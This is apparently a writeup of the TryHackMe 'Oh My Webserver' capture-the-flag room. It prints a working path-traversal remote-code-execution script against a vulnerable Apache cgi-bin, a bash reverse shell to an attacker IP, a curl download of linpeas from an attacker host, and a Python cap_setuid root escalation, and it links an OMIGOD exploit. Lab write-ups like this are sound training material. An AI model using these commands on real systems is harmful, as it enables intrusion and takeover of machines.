Oh My Webserver — Writeup

LINK TO THE ROOM : https://tryhackme.com/room/ohmyweb

My Target IP : 10.10.215.246

Let’s run a quick recon on the Target IP

nmap 10.10.215.246 -p- — min-rate 1000

strange i am getting 80 port closed.

This thing i learned in a ctf. which is try to use the knock command to check if the port opens or not.

and it worked!

Running a detailed scan on the discovered port.

nmap 10.10.215.246 -p 80,22 -sCV -oN nmap_initial -Pn

note the version of webserver

started a Dir Bruteforcing on the WebServer.

There is an error which might be exploitable but we don’t know for sure.

So let’s use the most powerful tool in CyberSec that is GOOGLE.

On googling for the exploit of the version of the web server running i found:

#!/bin/bash

if [[ $1 == '' ]]; [[ $2 == '' ]]; then
echo Set [TAGET-LIST.TXT] [PATH] [COMMAND]
echo ./PoC.sh targets.txt /etc/passwd
exit
fi
for host in $(cat $1); do
echo $host
curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done

# PoC.sh targets.txt /etc/passwd
# PoC.sh targets.txt /bin/sh whoami

First copy this exploit and save as exploit.sh and then create a targets.txt file containing “http://<targetIP>”

chmod +x exploit.sh

echo -e ‘http://<TARGET_IP>’ > targets.txt

bash exploit.sh targets.txt /bin/sh “<command>”

Now that we have RCE. Let’s get a reverse shell.

bash exploit.sh targets.txt /bin/bash “bash -i >& /dev/tcp/10.2.61.21/4242 0>&1”

What is the user flag?

To get root in docker container i downloaded linpeas and executed it

curl http://<attacker_ip>:<port>/linpeas.sh -o linpeas.sh

chmod +x linpeas.sh && ./linpeas.sh > out.txt

On reading the linpeas output I found something interesting in the capabilities.

cap_setuid+ep

cap_setuid can be exploited by

/usr/bin/python3.7 -c ‘import os; os.setuid(0); os.system(“/bin/bash”)’

cat /root/user.txt

What is the root flag?

For further enumeration I executed linpeas again.

/tmp/linpeas.sh

172.17.0.1

Didn’t find much in linpeas, except this IP so i thought of scanning it so for that i will have to get nmap on the box so let’s get nmap.

HOW to get nmap executable which u can tranfer and run.

GIT HUB LINK: https://github.com/andrew-d/static-binaries

now let’s run a python server here and tranfer to the shell.

chmod +x nmap_

let’s run this :

./nmap_ 172.17.0.1 -p- — min-rate 1000

(we know the IP to scan from linpeas’s output)

5986 port seems interesting, let’s google if there is a exploit for this.

unauthenticated RCE CVE-2021–38647

LINK TO THE EXPLOIT:

https://github.com/AlteredSecurity/CVE-2021-38647

THERE YOU HAVE IT! Room is completed

HAPPY HACKING!! 🎉🥳

LINK TREE: https://linktr.ee/RishabhRai